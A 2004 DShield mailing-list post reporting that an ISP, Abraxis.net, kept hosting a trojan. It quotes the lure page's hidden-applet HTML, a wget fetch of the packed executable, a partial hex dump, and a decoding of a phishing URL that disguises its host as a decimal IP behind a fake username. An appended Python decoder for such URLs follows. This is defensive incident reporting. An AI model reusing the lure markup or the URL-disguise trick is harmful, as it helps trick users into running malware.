[DShield] ISP freedom? Abraxis.net (was: "Academic Freedom"...)

Erik van Straten emvs.dsh.3FB4CC72 at cpo.tn.tudelft.nl
Wed Feb 18 00:20:49 GMT 2004


List,

If anyone has a contact at Abraxis.net, please wake them up :(

Here's an example of a clueless commercial ISP: Abraxis.net. They are
hosting a server with malicious code, that has been discussed all over
the net for days (see some pointers at the end of this mail), and seem
to refuse to do anything about it, or are too clueless to understand.

A very nice write-up can be found here:
http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=55
An nmap scan of the probably compromised abraxis box is here:
http://spamwatch.codefish.net.au/storage/trojan/150204/nmap.txt

Abraxis should help prevent people's PCs from becoming compromised.
Failing to do so, after this has been pointed out more than once (and
probably not just by me) is **bad** and IMO unacceptable Internet
behavior, and may even have legal consequences for Abraxis.

I've contacted abraxis.net via email (both abuse@ and support@) on Sun
2004-02-15 23:59 +0100 (CET), and have responded to both whitelisting
requests, and have received receipt confirmations afterwards. As the
site was still compromised on Monday, I phoned them on 2004-02-16 at
19:18 +0100, nr. 1-770-729-9699. A lady pointed out that I should send
an email; I told her that I had already done that, and that receipts
were confirmed after I answered their whitelisting requests. She told
me that they were going to look into the matter - I don't know where
they looked, but definitely NOT in the right place:

On 2004-02-18 00:57 +0100 I again downloaded (I meanwhile have a
number of identical copies) http://64.29.173.91/index.html :
| <HTML><BODY bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
| <h2>SERVER ERROR 550</h2>
| <APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1
| HEIGHT=1></APPLET></BODY></HTML>

(note: last line was wrapped by me, and that line was without CRLF)

wget http://64.29.173.91/javautil.zip
| --00:57:06  http://64.29.173.91/javautil.zip => `javautil.zip'
| [snip]
| 00:57:06 (77.08 KB/s) - `javautil.zip' saved [4736/4736]

Contents of javautil.zip (not a zip, but an exe compressed using FSG):
-------------------------------------------------------------------------
000000  4D 5A 90 00 03 00 00 00 04 00 00 00 50 45 00 00  MZ..........PE..
000010  4C 01 02 00 46 53 47 21 00 00 00 00 00 00 00 00  L...FSG!........
[snip]
000150  E0 00 00 C0 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C  ....KERNEL32.dll
[snip]
-------------------------------------------------------------------------

The offending emails and malware have been extensively discussed on
the full-disclosure list.

I've unpacked the FSG code from javautil.zip, but this is described on
the codefish page mentioned above, so I'll spare you the details.

Final note, the DShield handlers' diary mentions:
http://isc.incidents.org/diary.html?date=2004-02-15
> Updated February 15th 2004 21:37 EDT
>
> From the mailbag An e-mail message making the rounds claims that the
> recipient is under "police investigation" and gives a link to follow
> for more information. This link downloads a Trojan onto the user's
> computer. The site (federalpolice.com) is still live at the time of
> this writing.

NOTE: "federalpolice.com" is unrelated, Sam Spade decodes as follows:
----------------------------------------------------------------------
02/18/04 00:59:03 dns http://federalpolice.com:article872@1075686747
http://1075686747 using username federalpolice.com and password article872
Address 1075686747 is 64.29.173.91
nslookup 64.29.173.91
Canonical name: arpa-173.091.atl-001.abraxis.com
Addresses:
  64.29.173.91
----------------------------------------------------------------------

Commercial sites seem to have at least as much freedom as some Academic
institutions...

Regards,
Erik van Straten
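As an added example (not part of the original mail), here is a small Python decoder for the userinfo-plus-numeric-host trick that Sam Spade decodes above: everything before the "@" is only a username and password, and the real host is a single 32-bit number. It goes beyond the decimal case in the mail by also accepting hex and octal host forms, as inet_aton does; the sample URL is the one from the mail.

```python
import ipaddress
from urllib.parse import urlsplit


def _parse_number(tok):
    """Parse one host component as inet_aton would: 0x.. hex, 0.. octal, else decimal."""
    tok = tok.lower()
    try:
        if tok.startswith("0x"):
            return int(tok[2:], 16)
        if len(tok) > 1 and tok.startswith("0") and tok.isdigit():
            return int(tok, 8)
        if tok.isdigit():
            return int(tok, 10)
    except ValueError:
        pass
    return None  # not a number at all (a real hostname, or garbage)


def host_to_ip(host):
    """Canonicalize a numeric host (1 to 4 dot-separated numbers) to dotted quad.

    Returns None when the host is a name rather than a number.  The last
    component fills all remaining bytes, so "1075686747" is a full 32-bit
    address and "64.1944923" would be 64.29.173.91 as well.
    """
    nums = [_parse_number(p) for p in host.split(".")]
    if not 1 <= len(nums) <= 4 or any(n is None for n in nums):
        return None
    value = 0
    for n in nums[:-1]:
        if n > 255:
            return None
        value = (value << 8) | n
    remaining_bits = 8 * (5 - len(nums))
    if nums[-1] >= (1 << remaining_bits):
        return None
    return str(ipaddress.IPv4Address((value << remaining_bits) | nums[-1]))


def decode_obfuscated_url(url):
    """Split a URL into the decoy userinfo and the real (canonicalized) host."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    return {"username": parts.username, "password": parts.password,
            "host": host, "ip": host_to_ip(host), "path": parts.path or "/"}


if __name__ == "__main__":
    # The URL from the handlers' diary entry quoted in the mail.
    print(decode_obfuscated_url("http://federalpolice.com:article872@1075686747"))
```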
